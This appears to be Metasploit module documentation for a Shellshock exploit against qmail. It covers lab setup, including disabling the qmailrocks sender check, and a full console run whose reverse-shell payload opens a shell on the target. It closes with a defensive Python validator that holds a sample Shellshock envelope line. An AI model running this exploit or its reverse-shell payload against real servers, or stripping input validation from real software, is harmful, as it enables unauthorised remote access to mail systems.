## Vulnerable Application

Any qmail version (works on the latest versions, qmail-1.03 and netqmail-1.06) running on a system with a vulnerable BASH (Shellshock). In order to execute code, /bin/sh has to be linked to bash (usually the default configuration) and a valid recipient must be set in the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version, as it ensures the MAILFROM field is well-formed.

## Setting up a vulnerable environment

Install qmail on a Linux server with a Shellshock-vulnerable bash. Ensure that /bin/sh is linked to bash. Create an e-mail account on that qmail server.

IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/), which applies a patch that checks the vulnerable MAILFROM parameter. This version (with the patch applied) is NOT vulnerable. If you are using this version, change the `int mfcheck()` function in qmail-smtpd.c so that it always returns 0 (after applying the patch) and re-compile qmail-smtpd.

## Verification Steps

1. `use exploit/unix/smtp/qmail_bash_env_exec`
2. `set RHOST `
3. `set MAILTO `
4. `set payload cmd/unix/reverse`
5. `set LHOST `
6. optionally set `RPORT` and `LPORT`
7. `exploit`
8. **Verify** a new shell session is started

## Options

**MAILTO**

A valid e-mail recipient. Usually, admin@targetdomain.com can be used.

## Scenarios

**Tested on qmail-1.03 on Debian 6.0.6 (squeeze). BASH version 4.1.5(1).**

```
msf > use exploit/unix/smtp/qmail_bash_env_exec
msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113
rhost => 192.168.1.113
msf exploit(qmail_bash_env_exec) > set mailto "admin@testqmail2.test"
mailto => admin@testqmail2.test
msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(qmail_bash_env_exec) > show options

Module options (exploit/unix/smtp/qmail_bash_env_exec):

   Name    Current Setting        Required  Description
   ----    ---------------        --------  -----------
   MAILTO  admin@testqmail2.test  yes       TO address of the e-mail
   RHOST   192.168.1.113          yes       The target address
   RPORT   25                     yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.102    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(qmail_bash_env_exec) > run

[*] Started reverse TCP double handler on 192.168.1.102:4444
[*] 192.168.1.113:25 - Sending the payload...
[*] 192.168.1.113:25 - Sending RCPT TO admin@testqmail2.test
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RvZfov9i2ZuveLXA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "RvZfov9i2ZuveLXA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200

whoami
vpopmail
```
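The reason the qmailrocks build is not affected is the `mfcheck()` step mentioned in the setup section: the sender address is validated before qmail hands it to the delivery agent's environment, where a bash function definition would be interpreted. The Python below is an added example written for this page; it is not code from this module, from qmail or from qmailrocks. It implements a strict reverse-path check in that spirit and a scan over a constructed SMTP session that flags the Shellshock function-definition signature. The address grammar, the function names and the sample session lines are all assumptions of the example.

```python
import re

# Bash's exported-function syntax: an environment value beginning with "() {".
# This is the signature the Shellshock bugs key on; it is never legitimate in
# an SMTP envelope field.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# A deliberately strict subset of the RFC 5321 address grammar (dot-atom local
# part, dotted hostname domain). Assumption of this example: it is not the
# grammar that qmail-smtpd or the qmailrocks mfcheck() patch actually enforce.
ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]"
LOCAL_RE = re.compile(r"^" + ATEXT + r"+(\." + ATEXT + r"+)*$")
LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
DOMAIN_RE = re.compile(r"^" + LABEL + r"(\." + LABEL + r")+$")
# Command syntax: "MAIL FROM:<reverse-path>" with optional ESMTP parameters
# after the closing bracket (tolerated here, not validated).
MAIL_FROM_RE = re.compile(r"^MAIL\s+FROM:\s*<(.*)>(\s+\S+)*\s*$", re.IGNORECASE)


def check_mail_from(line):
    """Classify one SMTP MAIL FROM command line.

    Returns (accept, reason). accept is True only for the null reverse-path
    "<>" used by bounces or for a strictly well-formed local@domain.
    """
    line = line.strip()
    # Look for the function-definition signature on the raw line first, so it
    # is reported even when the command is otherwise unparsable.
    if SHELLSHOCK_RE.search(line):
        return False, "shellshock function-definition prefix"
    m = MAIL_FROM_RE.match(line)
    if not m:
        return False, "not a MAIL FROM command or angle brackets missing"
    path = m.group(1)
    if path == "":
        return True, "null reverse-path (bounce)"
    if path.count("@") != 1:
        return False, "reverse-path must contain exactly one '@'"
    local, domain = path.split("@")
    if not LOCAL_RE.match(local):
        return False, "malformed local part"
    if not DOMAIN_RE.match(domain):
        return False, "malformed domain"
    return True, "well-formed reverse-path"


def scan_session(lines):
    """Scan a captured SMTP session (one command per element).

    MAIL FROM lines get the full check; every other line is only searched for
    the function-definition signature. Returns a list of
    (line_number, reason, line) tuples for the lines that should be rejected.
    """
    findings = []
    for n, line in enumerate(lines, 1):
        if line.lstrip().upper().startswith("MAIL FROM"):
            ok, reason = check_mail_from(line)
        elif SHELLSHOCK_RE.search(line):
            ok, reason = False, "shellshock function-definition prefix outside MAIL FROM"
        else:
            continue
        if not ok:
            findings.append((n, reason, line.rstrip()))
    return findings


# Constructed sample session (not captured from a real server): a bounce, a
# legitimate sender, a malformed address, a Shellshock-style envelope whose
# function body is a harmless placeholder, and a domain with a bad label.
SAMPLE_SESSION = [
    "EHLO mail.example.test",
    "MAIL FROM:<>",
    "RCPT TO:<admin@testqmail2.test>",
    "MAIL FROM:<alice@example.test>",
    "MAIL FROM:<alice example.test>",
    "MAIL FROM:<() { :;}; echo marker>",
    "MAIL FROM: <bob@-bad.test>",
]

if __name__ == "__main__":
    for n, reason, line in scan_session(SAMPLE_SESSION):
        print(f"line {n}: rejected ({reason}): {line}")
```

Running the file prints three rejected lines (5, 6 and 7) and accepts the bounce and the well-formed sender. The signature check runs on the raw command before any parsing so that a payload hidden in an unparsable command is still reported rather than silently dropped as a syntax error; a real mail gateway would log such rejections as a Shellshock attempt in addition to returning a 5xx reply.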